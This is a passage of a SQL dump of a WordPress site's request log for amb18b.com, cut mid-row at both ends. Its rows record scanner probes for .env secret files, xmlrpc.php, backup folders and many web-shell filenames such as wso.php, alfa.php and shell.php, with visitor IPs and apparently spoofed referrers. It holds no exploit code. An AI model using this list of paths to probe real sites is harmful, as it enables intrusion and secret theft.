Access',1,'2025-11-19 14:28:50','2025-11-19 14:28:50'),(8138,'https://amb18b.com/admin/.env','45.148.10.165','Direct Access',1,'2025-11-19 14:28:52','2025-11-19 14:28:52'),(8139,'https://amb18b.com/backend/.env','45.148.10.165','Direct Access',1,'2025-11-19 14:28:53','2025-11-19 14:28:53'),(8140,'https://amb18b.com/frontend/.env','45.148.10.165','Direct Access',1,'2025-11-19 14:28:55','2025-11-19 14:28:55'),(8141,'https://amb18b.com/xmlrpc.php','8.218.212.177','Direct Access',1,'2025-11-19 15:03:45','2025-11-19 15:03:45'),(8142,'https://amb18b.com/wp-admin/css/','170.64.209.205','Invalid Referrer',1,'2025-11-19 15:35:10','2025-11-19 15:35:10'),(8143,'https://amb18b.com/xmlrpc.php','162.241.224.32','Direct Access',1,'2025-11-19 15:50:16','2025-11-19 15:50:16'),(8144,'https://amb18b.com/xmlrpc.php','170.205.73.55','Direct Access',1,'2025-11-19 16:38:07','2025-11-19 16:38:07'),(8145,'https://amb18b.com/xmlrpc.php','2405:201:8001:f0ea:e0b7:f68f:9a98:7170','Direct Access',1,'2025-11-19 16:47:34','2025-11-19 16:47:34'),(8146,'https://amb18b.com/xmlrpc.php','162.0.208.67','Direct Access',1,'2025-11-19 17:27:41','2025-11-19 17:27:41'),(8147,'https://amb18b.com/xmlrpc.php','50.6.153.191','Direct Access',1,'2025-11-19 18:12:48','2025-11-19 18:12:48'),(8148,'https://amb18b.com/xmlrpc.php','2a06:5b82:2070:8300::12','Direct Access',1,'2025-11-19 18:52:45','2025-11-19 18:52:45'),(8149,'https://amb18b.com/wp-includes/postnews.php','45.95.42.80','Invalid Referrer',1,'2025-11-19 19:53:58','2025-11-19 19:53:58'),(8150,'https://amb18b.com/wp-includes/postnews.php','45.95.42.80','Invalid Referrer',1,'2025-11-19 19:53:59','2025-11-19 19:53:59'),(8151,'https://amb18b.com/wp-admin/postnews.php','45.95.42.80','Invalid Referrer',2,'2025-11-19 19:54:15','2025-11-19 19:54:08'),(8152,'https://amb18b.com/xmlrpc.php','8.210.47.14','Direct Access',1,'2025-11-19 20:06:53','2025-11-19 20:06:53'),(8153,'https://amb18b.com/old/','35.194.81.44','Direct Access',1,'2025-11-19 21:08:24','2025-11-19 21:08:24'),(8154,'https://amb18b.com/backup/','35.194.81.44','Direct Access',1,'2025-11-19 21:08:25','2025-11-19 21:08:25'),(8155,'https://amb18b.com/new/','35.194.81.44','Direct Access',1,'2025-11-19 21:08:28','2025-11-19 21:08:28'),(8156,'https://amb18b.com/wp/','35.194.81.44','Direct Access',1,'2025-11-19 21:08:29','2025-11-19 21:08:29'),(8157,'https://amb18b.com/blog/','35.194.81.44','Direct Access',1,'2025-11-19 21:08:31','2025-11-19 21:08:31'),(8158,'https://amb18b.com/wordpress/','35.194.81.44','Direct Access',1,'2025-11-19 21:08:32','2025-11-19 21:08:32'),(8159,'https://amb18b.com/xmlrpc.php','162.0.208.67','Direct Access',1,'2025-11-19 21:34:33','2025-11-19 21:34:33'),(8160,'https://amb18b.com/new4.php','57.30.180.64','https://duckduckgo.com/',1,'2025-11-19 22:20:31','2025-11-19 22:20:31'),(8161,'https://amb18b.com/bolt.php','105.17.48.186','https://duckduckgo.com/',1,'2025-11-19 22:20:42','2025-11-19 22:20:42'),(8162,'https://amb18b.com/ava.php','146.164.212.35','https://www.google.co.uk/',1,'2025-11-19 22:20:44','2025-11-19 22:20:44'),(8163,'https://amb18b.com/pow.php','26.234.11.137','https://www.bing.com/',1,'2025-11-19 22:20:47','2025-11-19 22:20:47'),(8164,'https://amb18b.com/zuk.php','248.147.170.28','https://duckduckgo.com/',1,'2025-11-19 22:20:49','2025-11-19 22:20:49'),(8165,'https://amb18b.com/fss.php','201.54.45.150','https://www.google.com/',1,'2025-11-19 22:20:50','2025-11-19 22:20:50'),(8166,'https://amb18b.com/test1.php','8.134.40.93','https://duckduckgo.com/',1,'2025-11-19 22:20:52','2025-11-19 22:20:52'),(8167,'https://amb18b.com/core.php','146.157.67.81','https://www.yahoo.com/',1,'2025-11-19 22:20:54','2025-11-19 22:20:54'),(8168,'https://amb18b.com/elp.php','155.180.135.184','https://www.google.co.uk/',1,'2025-11-19 22:20:56','2025-11-19 22:20:56'),(8169,'https://amb18b.com/new.php','192.35.98.216','https://www.google.fr/',1,'2025-11-19 22:20:58','2025-11-19 22:20:58'),(8170,'https://amb18b.com/fox.php','232.42.255.31','https://www.bing.com/',1,'2025-11-19 22:20:59','2025-11-19 22:20:59'),(8171,'https://amb18b.com/wso.php','122.249.21.234','https://www.google.fr/',1,'2025-11-19 22:21:03','2025-11-19 22:21:03'),(8172,'https://amb18b.com/sts.php','143.81.116.144','https://www.google.fr/',1,'2025-11-19 22:21:11','2025-11-19 22:21:11'),(8173,'https://amb18b.com/1.php','193.251.255.154','https://www.google.de/',1,'2025-11-19 22:21:16','2025-11-19 22:21:16'),(8174,'https://amb18b.com/aa.php','121.154.224.186','https://www.google.fr/',1,'2025-11-19 22:21:18','2025-11-19 22:21:18'),(8175,'https://amb18b.com/about.php','172.41.9.39','https://www.google.co.uk/',1,'2025-11-19 22:21:20','2025-11-19 22:21:20'),(8176,'https://amb18b.com/admin.php','213.129.243.25','https://duckduckgo.com/',1,'2025-11-19 22:21:22','2025-11-19 22:21:22'),(8177,'https://amb18b.com/admin.php?p=','104.213.157.134','https://www.yahoo.com/',1,'2025-11-19 22:21:24','2025-11-19 22:21:24'),(8178,'https://amb18b.com/akc.php?p=','11.190.194.155','https://www.google.co.uk/',1,'2025-11-19 22:21:26','2025-11-19 22:21:26'),(8179,'https://amb18b.com/app/webroot/filemanager.php?p=','74.58.109.175','https://www.bing.com/',1,'2025-11-19 22:21:28','2025-11-19 22:21:28'),(8180,'https://amb18b.com/asasx.php?p=','216.91.221.26','https://www.google.fr/',1,'2025-11-19 22:21:30','2025-11-19 22:21:30'),(8181,'https://amb18b.com/atomlib.php','2.64.83.152','https://www.yahoo.com/',1,'2025-11-19 22:21:32','2025-11-19 22:21:32'),(8182,'https://amb18b.com/autoload_classmap.php','30.10.212.196','https://duckduckgo.com/',1,'2025-11-19 22:21:35','2025-11-19 22:21:35'),(8183,'https://amb18b.com/buy.php','168.51.38.96','https://duckduckgo.com/',1,'2025-11-19 22:21:37','2025-11-19 22:21:37'),(8184,'https://amb18b.com/chosen.php?p=','64.137.12.189','https://www.google.co.uk/',1,'2025-11-19 22:21:39','2025-11-19 22:21:39'),(8185,'https://amb18b.com/classwithtostring.php','28.171.111.2','https://www.google.co.uk/',1,'2025-11-19 22:21:42','2025-11-19 22:21:42'),(8186,'https://amb18b.com/cong.php','49.63.230.100','https://www.google.de/',1,'2025-11-19 22:21:44','2025-11-19 22:21:44'),(8187,'https://amb18b.com/default.php','151.227.214.118','https://www.google.com/',1,'2025-11-19 22:21:46','2025-11-19 22:21:46'),(8188,'https://amb18b.com/dropdown.php?p=','52.84.102.169','https://www.google.co.uk/',1,'2025-11-19 22:21:48','2025-11-19 22:21:48'),(8189,'https://amb18b.com/filemanager/dialog.php','92.80.43.16','https://www.google.de/',1,'2025-11-19 22:21:50','2025-11-19 22:21:50'),(8190,'https://amb18b.com/ioxi-o.php','108.79.20.126','https://duckduckgo.com/',1,'2025-11-19 22:21:52','2025-11-19 22:21:52'),(8191,'https://amb18b.com/item.php','167.195.62.65','https://www.bing.com/',1,'2025-11-19 22:21:54','2025-11-19 22:21:54'),(8192,'https://amb18b.com/makeasmtp.php?p=','16.151.61.212','https://www.google.fr/',1,'2025-11-19 22:21:56','2025-11-19 22:21:56'),(8193,'https://amb18b.com/abcd.php','229.23.157.2','https://www.google.com/',1,'2025-11-19 22:21:59','2025-11-19 22:21:59'),(8194,'https://amb18b.com/ds.php','217.183.189.52','https://www.google.com/',1,'2025-11-19 22:22:01','2025-11-19 22:22:01'),(8195,'https://amb18b.com/alfa.php','109.240.100.80','https://www.google.co.uk/',1,'2025-11-19 22:22:03','2025-11-19 22:22:03'),(8196,'https://amb18b.com/hplfuns.php','157.143.35.151','https://www.google.com/',1,'2025-11-19 22:22:05','2025-11-19 22:22:05'),(8197,'https://amb18b.com/file.php','215.91.179.22','https://www.google.com/',1,'2025-11-19 22:22:07','2025-11-19 22:22:07'),(8198,'https://amb18b.com/adminfuns.php','180.104.235.46','https://www.google.com/',1,'2025-11-19 22:22:10','2025-11-19 22:22:10'),(8199,'https://amb18b.com/wp-admin/css/colors/blue/index.php','29.190.47.179','https://duckduckgo.com/',1,'2025-11-19 22:22:12','2025-11-19 22:22:12'),(8200,'https://amb18b.com/moon.php','103.126.3.237','https://www.yahoo.com/',1,'2025-11-19 22:22:16','2025-11-19 22:22:16'),(8201,'https://amb18b.com/wp-admin/includes/','218.64.253.202','https://www.google.de/',1,'2025-11-19 22:22:18','2025-11-19 22:22:18'),(8202,'https://amb18b.com/goods.php','108.13.204.58','https://www.google.co.uk/',1,'2025-11-19 22:22:20','2025-11-19 22:22:20'),(8203,'https://amb18b.com/wp-good.php','109.212.87.184','https://www.bing.com/',1,'2025-11-19 22:22:23','2025-11-19 22:22:23'),(8204,'https://amb18b.com/xmrlpc.php','78.59.73.133','https://www.google.de/',1,'2025-11-19 22:22:25','2025-11-19 22:22:25'),(8205,'https://amb18b.com/info.php','44.11.94.72','https://www.yahoo.com/',1,'2025-11-19 22:22:27','2025-11-19 22:22:27'),(8206,'https://amb18b.com/.__info.php','255.166.64.49','https://www.bing.com/',1,'2025-11-19 22:22:29','2025-11-19 22:22:29'),(8207,'https://amb18b.com/xmlrpc.php','76.10.184.160','https://www.google.co.uk/',1,'2025-11-19 22:22:31','2025-11-19 22:22:31'),(8208,'https://amb18b.com/ALFA_DATA/admin.php','183.128.28.61','https://www.yahoo.com/',1,'2025-11-19 22:22:33','2025-11-19 22:22:33'),(8209,'https://amb18b.com/aaa.php','101.87.211.211','https://duckduckgo.com/',1,'2025-11-19 22:22:35','2025-11-19 22:22:35'),(8210,'https://amb18b.com/admin/admin.php','203.57.171.47','https://duckduckgo.com/',1,'2025-11-19 22:22:37','2025-11-19 22:22:37'),(8211,'https://amb18b.com/akcc.php','109.190.57.146','https://www.google.com/',1,'2025-11-19 22:22:39','2025-11-19 22:22:39'),(8212,'https://amb18b.com/build.php','47.185.72.126','https://www.google.com/',1,'2025-11-19 22:22:40','2025-11-19 22:22:40'),(8213,'https://amb18b.com/chosen.php','247.36.156.99','https://www.bing.com/',1,'2025-11-19 22:22:42','2025-11-19 22:22:42'),(8214,'https://amb18b.com/filemanager.php','8.153.118.104','https://www.yahoo.com/',1,'2025-11-19 22:22:45','2025-11-19 22:22:45'),(8215,'https://amb18b.com/flower.php','126.139.160.34','https://duckduckgo.com/',1,'2025-11-19 22:22:46','2025-11-19 22:22:46'),(8216,'https://amb18b.com/function/function.php','239.221.134.37','https://www.google.com/',1,'2025-11-19 22:22:48','2025-11-19 22:22:48'),(8217,'https://amb18b.com/images/index.php','146.170.248.82','https://www.google.fr/',1,'2025-11-19 22:22:50','2025-11-19 22:22:50'),(8218,'https://amb18b.com/images/images/about.php','104.82.71.59','https://www.google.de/',1,'2025-11-19 22:22:52','2025-11-19 22:22:52'),(8219,'https://amb18b.com/mari.php','240.34.189.84','https://www.google.de/',1,'2025-11-19 22:22:54','2025-11-19 22:22:54'),(8220,'https://amb18b.com/nc4.php','43.145.117.125','https://www.yahoo.com/',1,'2025-11-19 22:22:56','2025-11-19 22:22:56'),(8221,'https://amb18b.com/wp-includes/style-engine/index.php','193.245.109.29','https://www.google.co.uk/',1,'2025-11-19 22:23:00','2025-11-19 22:23:00'),(8222,'https://amb18b.com/cgi-bin/','153.95.154.81','https://duckduckgo.com/',1,'2025-11-19 22:23:02','2025-11-19 22:23:02'),(8223,'https://amb18b.com/xleet.php','151.228.105.168','https://www.google.fr/',1,'2025-11-19 22:23:04','2025-11-19 22:23:04'),(8224,'https://amb18b.com/wp-admin/includes/','205.184.15.177','https://www.bing.com/',1,'2025-11-19 22:23:06','2025-11-19 22:23:06'),(8225,'https://amb18b.com/wp-includes/Text/Diff/Renderer/','79.50.185.220','https://www.yahoo.com/',1,'2025-11-19 22:23:17','2025-11-19 22:23:17'),(8226,'https://amb18b.com/wp-includes/style-engine/','219.75.28.1','https://www.google.com/',1,'2025-11-19 22:23:20','2025-11-19 22:23:20'),(8227,'https://amb18b.com/asasx.php','154.190.7.231','https://www.google.de/',1,'2025-11-19 22:23:22','2025-11-19 22:23:22'),(8228,'https://amb18b.com/file2.php','192.253.30.173','https://duckduckgo.com/',1,'2025-11-19 22:23:24','2025-11-19 22:23:24'),(8229,'https://amb18b.com/wp-includes/IXR/','194.185.126.118','https://www.google.co.uk/',1,'2025-11-19 22:23:30','2025-11-19 22:23:30'),(8230,'https://amb18b.com/wp-includes/block-supports/','135.1.254.189','https://www.google.com/',1,'2025-11-19 22:23:32','2025-11-19 22:23:32'),(8231,'https://amb18b.com/wp-includes/fonts/','42.102.92.38','https://www.google.fr/',1,'2025-11-19 22:23:34','2025-11-19 22:23:34'),(8232,'https://amb18b.com/wp-includes/fonts/index.php','196.207.155.202','https://duckduckgo.com/',1,'2025-11-19 22:23:36','2025-11-19 22:23:36'),(8233,'https://amb18b.com/wp-includes/js/crop/','220.129.109.186','https://www.google.com/',1,'2025-11-19 22:23:38','2025-11-19 22:23:38'),(8234,'https://amb18b.com/wp-includes/rest-api/','164.77.243.198','https://duckduckgo.com/',1,'2025-11-19 22:23:40','2025-11-19 22:23:40'),(8235,'https://amb18b.com/wp-includes/widgets/','195.147.229.254','https://www.yahoo.com/',1,'2025-11-19 22:23:42','2025-11-19 22:23:42'),(8236,'https://amb18b.com/f5.php','154.218.226.141','https://www.google.de/',1,'2025-11-19 22:23:44','2025-11-19 22:23:44'),(8237,'https://amb18b.com/god4m.php','52.67.66.56','https://www.google.co.uk/',1,'2025-11-19 22:23:46','2025-11-19 22:23:46'),(8238,'https://amb18b.com/uploads/','19.52.65.47','https://www.yahoo.com/',1,'2025-11-19 22:23:48','2025-11-19 22:23:48'),(8239,'https://amb18b.com/0.php','191.162.234.158','https://www.bing.com/',1,'2025-11-19 22:23:50','2025-11-19 22:23:50'),(8240,'https://amb18b.com/07.php','252.238.231.127','https://www.yahoo.com/',1,'2025-11-19 22:23:52','2025-11-19 22:23:52'),(8241,'https://amb18b.com/dropdown.php','101.236.105.201','https://www.google.co.uk/',1,'2025-11-19 22:23:54','2025-11-19 22:23:54'),(8242,'https://amb18b.com/makeasmtp.php','219.191.88.230','https://www.yahoo.com/',1,'2025-11-19 22:23:56','2025-11-19 22:23:56'),(8243,'https://amb18b.com/wp-sigunq.php','142.122.165.128','https://duckduckgo.com/',1,'2025-11-19 22:23:58','2025-11-19 22:23:58'),(8244,'https://amb18b.com/wso112233.php','143.81.231.72','https://www.bing.com/',1,'2025-11-19 22:24:00','2025-11-19 22:24:00'),(8245,'https://amb18b.com/alfanew.php','35.87.217.195','https://www.google.com/',1,'2025-11-19 22:24:02','2025-11-19 22:24:02'),(8246,'https://amb18b.com/fw.php','4.89.15.171','https://www.yahoo.com/',1,'2025-11-19 22:24:05','2025-11-19 22:24:05'),(8247,'https://amb18b.com/install.php','38.76.252.227','https://www.google.co.uk/',1,'2025-11-19 22:24:07','2025-11-19 22:24:07'),(8248,'https://amb18b.com/simple.php','95.160.74.244','https://www.bing.com/',1,'2025-11-19 22:24:10','2025-11-19 22:24:10'),(8249,'https://amb18b.com/inputs.php','227.137.45.20','https://www.google.fr/',1,'2025-11-19 22:24:12','2025-11-19 22:24:12'),(8250,'https://amb18b.com/classsmtps.php','120.157.227.19','https://www.yahoo.com/',1,'2025-11-19 22:24:14','2025-11-19 22:24:14'),(8251,'https://amb18b.com/wp-blog-header.php','106.243.246.146','https://www.google.com/',1,'2025-11-19 22:24:16','2025-11-19 22:24:16'),(8252,'https://amb18b.com/wp-trackback.php','136.124.52.74','https://www.google.de/',1,'2025-11-19 22:24:18','2025-11-19 22:24:18'),(8253,'https://amb18b.com/wp-signup.php','67.200.100.128','https://www.google.de/',1,'2025-11-19 22:24:20','2025-11-19 22:24:20'),(8254,'https://amb18b.com/plugins.php','119.175.62.222','https://www.google.de/',1,'2025-11-19 22:24:26','2025-11-19 22:24:26'),(8255,'https://amb18b.com/post.php','56.139.133.161','https://www.google.co.uk/',1,'2025-11-19 22:24:28','2025-11-19 22:24:28'),(8256,'https://amb18b.com/wp-2019.php','96.94.230.82','https://www.yahoo.com/',1,'2025-11-19 22:24:30','2025-11-19 22:24:30'),(8257,'https://amb18b.com/geju.php','162.113.228.71','https://www.google.co.uk/',1,'2025-11-19 22:24:32','2025-11-19 22:24:32'),(8258,'https://amb18b.com/wp.php','179.108.169.198','https://www.yahoo.com/',1,'2025-11-19 22:24:34','2025-11-19 22:24:34'),(8259,'https://amb18b.com/hoot.php','140.159.237.154','https://www.bing.com/',1,'2025-11-19 22:24:36','2025-11-19 22:24:36'),(8260,'https://amb18b.com/css.php','3.199.179.77','https://www.google.de/',1,'2025-11-19 22:24:38','2025-11-19 22:24:38'),(8261,'https://amb18b.com/log.php','15.38.72.8','https://www.google.de/',1,'2025-11-19 22:24:41','2025-11-19 22:24:41'),(8262,'https://amb18b.com/mail.php','186.187.186.189','https://www.yahoo.com/',1,'2025-11-19 22:24:43','2025-11-19 22:24:43'),(8263,'https://amb18b.com/bak.php','42.89.192.113','https://www.yahoo.com/',1,'2025-11-19 22:24:45','2025-11-19 22:24:45'),(8264,'https://amb18b.com/content.php','132.220.230.164','https://www.google.de/',1,'2025-11-19 22:24:47','2025-11-19 22:24:47'),(8265,'https://amb18b.com/upfile.php','178.250.234.251','https://duckduckgo.com/',1,'2025-11-19 22:24:49','2025-11-19 22:24:49'),(8266,'https://amb18b.com/wp-conflg.php','56.129.144.54','https://www.google.com/',1,'2025-11-19 22:24:51','2025-11-19 22:24:51'),(8267,'https://amb18b.com/bypass.php','152.245.49.29','https://www.bing.com/',1,'2025-11-19 22:24:53','2025-11-19 22:24:53'),(8268,'https://amb18b.com/404.php','254.74.213.219','https://www.google.com/',1,'2025-11-19 22:24:55','2025-11-19 22:24:55'),(8269,'https://amb18b.com/updates.php','199.27.25.179','https://duckduckgo.com/',1,'2025-11-19 22:24:57','2025-11-19 22:24:57'),(8270,'https://amb18b.com/radio.php','32.92.251.182','https://www.google.de/',1,'2025-11-19 22:24:59','2025-11-19 22:24:59'),(8271,'https://amb18b.com/ae.php','192.215.182.199','https://duckduckgo.com/',1,'2025-11-19 22:25:01','2025-11-19 22:25:01'),(8272,'https://amb18b.com/blog.php','189.19.53.140','https://www.google.fr/',1,'2025-11-19 22:25:03','2025-11-19 22:25:03'),(8273,'https://amb18b.com/themes.php','183.171.99.97','https://www.yahoo.com/',1,'2025-11-19 22:25:05','2025-11-19 22:25:05'),(8274,'https://amb18b.com/ini.php','105.199.228.154','https://www.google.com/',1,'2025-11-19 22:25:07','2025-11-19 22:25:07'),(8275,'https://amb18b.com/as.php','54.13.250.110','https://www.google.co.uk/',1,'2025-11-19 22:25:09','2025-11-19 22:25:09'),(8276,'https://amb18b.com/shell.php','158.16.19.153','https://www.bing.com/',1,'2025-11-19 22:25:11','2025-11-19 22:25:11'),(8277,'https://amb18b.com/ws.php','12.147.145.46','https://www.google.com/',1,'2025-11-19 22:25:13','2025-11-19 22:25:13'),(8278,'https://amb18b.com/123.php','2.183.15.74','https://www.google.co.uk/',1,'2025-11-19 22:25:15','2025-11-19 22:25:15'),(8279,'https://amb18b.com/9.php','85.233.144.58','https://www.google.fr/',1,'2025-11-19 22:25:30','2025-11-19 22:25:30'),(8280,'https://amb18b.com/admin-ajax.php','91.67.124.91','https://www.yahoo.com/',1,'2025-11-19 22:25:32','2025-11-19 22:25:32'),(8281,'https://amb18b.com/akc.php','122.99.108.75','https://www.google.de/',1,'2025-11-19 22:25:34','2025-11-19 22:25:34'),(8282,'https://amb18b.com/asd.php','201.208.156.198','https://www.google.com/',1,'2025-11-19 22:25:36','2025-11-19 22:25:36'),(8283,'https://amb18b.com/axx.php','82.40.137.248','https://www.google.com/',1,'2025-11-19 22:25:38','2025-11-19 22:25:38'),(8284,'https://amb18b.com/berax.php','188.41.172.215','https://www.bing.com/',1,'2025-11-19 22:25:41','2025-11-19 22:25:41'),(8285,'https://amb18b.com/checkbox.php','206.58.93.170','https://www.google.com/',1,'2025-11-19 22:25:42','2025-11-19 22:25:42'),(8286,'https://amb18b.com/file4.php','251.53.126.202','https://www.google.fr/',1,'2025-11-19 22:25:44','2025-11-19 22:25:44'),(8287,'https://amb18b.com/form.php','239.170.74.45','https://www.yahoo.com/',1,'2025-11-19 22:25:46','2025-11-19 22:25:46'),(8288,'https://amb18b.com/gecko.php','250.117.227.15','https://www.google.de/',1,'2025-11-19 22:25:48','2025-11-19 22:25:48'),(8289,'https://amb18b.com/kyami.php','55.215.113.246','https://www.yahoo.com/',1,'2025-11-19 22:25:50','2025-11-19 22:25:50'),(8290,'https://amb18b.com/manager.php','10.153.157.177','https://www.google.com/',1,'2025-11-19 22:25:52','2025-11-19 22:25:52'),(8291,'https://amb18b.com/wp-admin.php','240.70.32.140','https://duckduckgo.com/',1,'2025-11-19 22:25:54','2025-11-19 22:25:54'),(8292,'https://amb18b.com/xmlrpc.php','2603:3:6105:e00::','Direct Access',1,'2025-11-19 23:19:27','2025-11-19 23:19:27'),(8293,'https://amb18b.com/htaccess.php','51.103.74.100','Direct Access',1,'2025-11-20 00:04:46','2025-11-20 00:04:46'),(8294,'https://amb18b.com/readme.php','51.103.74.100','Direct Access',1,'2025-11-20 00:04:48','2025-11-20 00:04:48'),(8295,'https://amb18b.com/file30.php','51.103.74.100','Direct Access',1,'2025-11-20 00:04:50','2025-11-20 00:04:50'),(8296,'https://amb18b.com/as.php','51.103.74.100','Direct Access',1,'2025-11-20 00:04:51','2025-11-20 00:04:51'),(8297,'https://amb18b.com/tajj.php','51.103.74.100','Direct Access',1,'2025-11-20 00:04:54','2025-11-20 00:04:54'),(8298,'https://amb18b.com/fdd2.php','51.103.74.100','Direct Access',1,'2025-11-20 00:04:56','2025-11-20 00:04:56'),(8299,'https://amb18b.com/class9.php','51.103.74.100','Direct Access',1,'2025-11-20 00:04:58','2025-11-20 00:04:58'),(8300,'https://amb18b.com/sto.php','51.103.74.100','Direct Access',1,'2025-11-20 00:04:59','2025-11-20 00:04:59'),(8301,'https://amb18b.com/7h.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:01','2025-11-20 00:05:01'),(8302,'https://amb18b.com/fh26.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:03','2025-11-20 00:05:03'),(8303,'https://amb18b.com/ixj.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:05','2025-11-20 00:05:05'),(8304,'https://amb18b.com/x23.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:06','2025-11-20 00:05:06'),(8305,'https://amb18b.com/0xs.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:08','2025-11-20 00:05:08'),(8306,'https://amb18b.com/Zeiss.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:10','2025-11-20 00:05:10'),(8307,'https://amb18b.com/x0x.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:13','2025-11-20 00:05:13'),(8308,'https://amb18b.com/adin.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:15','2025-11-20 00:05:15'),(8309,'https://amb18b.com/403.php','51.103.74.100','Direct Access',2,'2025-11-20 00:07:42','2025-11-20 00:05:17'),(8310,'https://amb18b.com/max.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:18','2025-11-20 00:05:18'),(8311,'https://amb18b.com/m.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:20','2025-11-20 00:05:20'),(8312,'https://amb18b.com/post.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:22','2025-11-20 00:05:22'),(8313,'https://amb18b.com/themes.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:24','2025-11-20 00:05:24'),(8314,'https://amb18b.com/ALFA_DATA/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:27','2025-11-20 00:05:27'),(8315,'https://amb18b.com/wp-admin/maint/about.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:29','2025-11-20 00:05:29'),(8316,'https://amb18b.com/wp-admin/network/wp-conflg.php?p=','51.103.74.100','Direct Access',1,'2025-11-20 00:05:30','2025-11-20 00:05:30'),(8317,'https://amb18b.com/click.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:32','2025-11-20 00:05:32'),(8318,'https://amb18b.com/install.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:34','2025-11-20 00:05:34'),(8319,'https://amb18b.com/lv.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:35','2025-11-20 00:05:35'),(8320,'https://amb18b.com/simple.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:38','2025-11-20 00:05:38'),(8321,'https://amb18b.com/13k.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:39','2025-11-20 00:05:39'),(8322,'https://amb18b.com/css.php','51.103.74.100','Direct Access',2,'2025-11-20 00:06:15','2025-11-20 00:05:42'),(8323,'https://amb18b.com/up.php?x=','51.103.74.100','Direct Access',1,'2025-11-20 00:05:43','2025-11-20 00:05:43'),(8324,'https://amb18b.com/0x1949.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:45','2025-11-20 00:05:45'),(8325,'https://amb18b.com/cong.php','51.103.74.100','Direct Access',2,'2025-11-20 00:06:00','2025-11-20 00:05:48'),(8326,'https://amb18b.com/fw.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:50','2025-11-20 00:05:50'),(8327,'https://amb18b.com/bs1.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:52','2025-11-20 00:05:52'),(8328,'https://amb18b.com/wp-includes/images/wp-login.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:53','2025-11-20 00:05:53'),(8329,'https://amb18b.com/termps.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:55','2025-11-20 00:05:55'),(8330,'https://amb18b.com/brand.php','51.103.74.100','Direct Access',1,'2025-11-20 00:05:57','2025-11-20 00:05:57'),(8331,'https://amb18b.com/atomlib.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:01','2025-11-20 00:06:01'),(8332,'https://amb18b.com/w.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:03','2025-11-20 00:06:03'),(8333,'https://amb18b.com/404.php','51.103.74.100','Direct Access',2,'2025-11-20 00:07:28','2025-11-20 00:06:06'),(8334,'https://amb18b.com/article.php','51.103.74.100','Direct Access',2,'2025-11-20 00:07:36','2025-11-20 00:06:08'),(8335,'https://amb18b.com/0x.php','51.103.74.100','Direct Access',2,'2025-11-20 00:06:29','2025-11-20 00:06:13'),(8336,'https://amb18b.com/222.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:17','2025-11-20 00:06:17'),(8337,'https://amb18b.com/1.php','51.103.74.100','Direct Access',2,'2025-11-20 00:07:40','2025-11-20 00:06:19'),(8338,'https://amb18b.com/admin.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:20','2025-11-20 00:06:20'),(8339,'https://amb18b.com/wp-admin/maint/maint.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:22','2025-11-20 00:06:22'),(8340,'https://amb18b.com/classwithtostring.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:24','2025-11-20 00:06:24'),(8341,'https://amb18b.com/dropdown.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:26','2025-11-20 00:06:26'),(8342,'https://amb18b.com/moon.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:27','2025-11-20 00:06:27'),(8343,'https://amb18b.com/moon.php?p=','51.103.74.100','Direct Access',1,'2025-11-20 00:06:31','2025-11-20 00:06:31'),(8344,'https://amb18b.com/autoload_classmap.php?p=','51.103.74.100','Direct Access',1,'2025-11-20 00:06:32','2025-11-20 00:06:32'),(8345,'https://amb18b.com/inputs.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:34','2025-11-20 00:06:34'),(8346,'https://amb18b.com/default.php','51.103.74.100','Direct Access',1,'2025-11-20 00:06:36','2025-11-20 00:06:36'),(8347,'https://amb18b.com/fm.php?fm=true','51.103.74.100','Direct Access',1,'2025-11-20 00:07:03','2025-11-20 00:07:03'),(8348,'https://amb18b.com/about.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:05','2025-11-20 00:07:05'),(8349,'https://amb18b.com/file.php?','51.103.74.100','Direct Access',1,'2025-11-20 00:07:07','2025-11-20 00:07:07'),(8350,'https://amb18b.com/alfa.php','51.103.74.100','Direct Access',2,'2025-11-20 00:07:38','2025-11-20 00:07:09'),(8351,'https://amb18b.com/buy.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:10','2025-11-20 00:07:10'),(8352,'https://amb18b.com/themes/twentytwentytwo/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:12','2025-11-20 00:07:12'),(8353,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','51.103.74.100','Direct Access',1,'2025-11-20 00:07:14','2025-11-20 00:07:14'),(8354,'https://amb18b.com/wp-admin/wp-conflg.php?p=','51.103.74.100','Direct Access',1,'2025-11-20 00:07:15','2025-11-20 00:07:15'),(8355,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','51.103.74.100','Direct Access',1,'2025-11-20 00:07:18','2025-11-20 00:07:18'),(8356,'https://amb18b.com/manager.php?p=','51.103.74.100','Direct Access',1,'2025-11-20 00:07:19','2025-11-20 00:07:19'),(8357,'https://amb18b.com/js/fm.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:22','2025-11-20 